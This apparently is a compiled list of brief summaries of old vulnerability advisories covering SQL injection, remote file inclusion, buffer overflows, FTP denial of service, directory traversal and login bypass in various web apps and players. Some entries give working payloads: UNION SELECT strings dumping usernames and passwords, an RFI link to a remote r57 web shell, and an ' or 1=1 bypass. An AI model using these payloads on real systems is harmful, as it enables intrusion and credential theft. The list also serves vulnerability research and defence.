An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter entry_id. An example of such a query is -9999+union+all+select+1,concat(username,char(58),password),3,4+from+user-- or -9999+union+all+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,0,11,12,13,14+from+user--&mod_action=detail. This query will allow the attacker to view the username and password of the users in the database.
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the removeChild() method. By passing an object to the removeChild() method, an attacker can cause a NULL pointer dereference resulting in a crash.
The default prefix for database tables is 'yap_' but can be changed at installation. A PoC is provided to demonstrate how to extract the username and password from the database. An SQL injection is also provided to extract the username and password from the database, but the user must be logged in as an administrator.
PHPLinkAdmin 1.0 is vulnerable to Remote File Inclusion and SQL Injection. The vulnerable code is present in linkadmin.php and edlink.php respectively. The PoC for Remote File Inclusion is http://127.0.0.1/path/linkadmin.php?page=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt? and for SQL Injection is http://127.0.0.1/path/edlink.php?linkid=-1' union all select 1,2,3,4,concat_ws(0x3a,user(),database(),version())'--
This exploit allows an attacker to execute arbitrary code on a vulnerable system by exploiting a buffer overflow vulnerability in Rosoft media player. The exploit is multi-targeted and works on Microsoft Windows Trust SP3 (Frensh), Microsoft Windows Trust SP2 (Frensh), Microsoft Windows XP SP3 (Frensh) and Microsoft Windows XP SP2 (Frensh). The attacker can choose to execute either calc.exe or bindshell LPORT=7777. The exploit is coded by SimO-s0fT and was released in 2008.
VLC 0.9.8a Web UI is vulnerable to a remote stack overflow vulnerability. An attacker can send a specially crafted HTTP request with a large input parameter to the vulnerable server, which will cause the server to crash.
A denial of service vulnerability exists in FTP Serv-U up to 7.4.0.1, which allows an attacker to saturate the server and cause it to stop responding. This is achieved by sending a SMNT command followed by a '**' sequence to the server.
A vulnerability is caused due to an input validation error when handling FTP "MKD" requests. This can be exploited to escape the FTP root and create arbitrary directory on the system via directory traversal attacks using the ".." character sequence.
UBBThreads is vulnerable to SQL injection in the admin login page. An attacker can use the UNION SELECT statement to obtain the admin users' plaintext passwords. The attacker can also turn on file attachments via /ubbthreads/admin/editconfig.php?Cat= and then upload a php command shell as an attachment to a post. Additionally, the attacker can query the MySQL database via /ubbthreads/admin/dbcommand.php?Cat= and get the MySQL username/password (which is stored in plaintext) by viewing the HTML Source of /ubbthreads/admin/editconfig.php?Cat=.
A vulnerability in Kim Websites 1.0 allows an attacker to bypass authentication by entering ' or 1=1/* as the username and leaving the password field blank.
Services By CQR